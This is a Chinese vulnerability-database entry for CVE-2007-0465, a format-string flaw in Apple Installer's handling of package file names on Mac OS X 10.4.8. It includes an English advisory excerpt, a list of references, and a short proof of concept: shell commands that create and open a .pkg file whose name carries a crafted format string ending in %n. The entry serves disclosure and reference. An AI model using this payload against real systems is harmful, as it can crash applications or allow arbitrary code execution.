Apple Installer软件包文件名格式串处理漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1112098 漏洞类型 格式化字符串
发布时间 2007-01-27 更新时间 2007-01-31
CVE编号 CVE-2007-0465 CNNVD-ID CNNVD-200701-551
漏洞平台 OSX CVSS评分 7.6
|漏洞来源
https://www.exploit-db.com/exploits/29532
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200701-551
|漏洞详情
AppleInstaller是负责安装MacOSX软件包的应用程序。AppleInstaller没有正确地处理软件包的文件名字符串,允许攻击者通过提交特制格式串(1)PKG,(2)DISTZ,(3)MPKG包名导致拒绝服务或执行任意代码。
|漏洞EXP
source: http://www.securityfocus.com/bid/22272/info

Apple Installer is prone to a format-string vulnerability because the application fails to properly sanitize user-supplied input before passing it as the format specifier to a formatted-printing function.

A successful attack may crash the application or possibly allow the attacker to execute arbitrary code. This may facilitate unauthorized access or privilege escalation in the context of the user running the application.

Apple Installer Version 2.1.5 on Mac OS X 10.4.8 is vulnerable to this issue; other versions may also be affected. 

$ touch AAAA`ruby -e 'require "cgi"; print CGI::escape("\x9c\xe7\xff\xbf") + CGI::escape("%.20d") + CGI::escape("%x" * 20)'`%n.pkg
$ open AAAA%9C%E7%FF%BF%25.20d%25x%25x%25x%25x%25x%25x%25x%25x%25x%25x%25x%25x%25x%25x%25x%25x%25x%25x%25x%25x%n.pkg
|参考资料

来源:US-CERT
名称:TA07-109A
链接:http://www.us-cert.gov/cas/techalerts/TA07-109A.html
来源:BID
名称:22272
链接:http://www.securityfocus.com/bid/22272
来源:MISC
链接:http://projects.info-pull.com/moab/MOAB-26-01-2007.html
来源:XF
名称:macos-installer-format-string(31883)
链接:http://xforce.iss.net/xforce/xfdb/31883
来源:SECTRACK
名称:1017940
链接:http://www.securitytracker.com/id?1017940
来源:OSVDB
名称:32705
链接:http://www.osvdb.org/32705
来源:VUPEN
名称:ADV-2007-1470
链接:http://www.frsirt.com/english/advisories/2007/1470
来源:SECUNIA
名称:24966
链接:http://secunia.com/advisories/24966
来源:APPLE
名称:APPLE-SA-2007-04-19
链接:http://lists.apple.com/archives/Security-announce/2007/Apr/msg00001.html
来源:docs.info.apple.com
链接:http://docs.info.apple.com/article.html?artnum=305391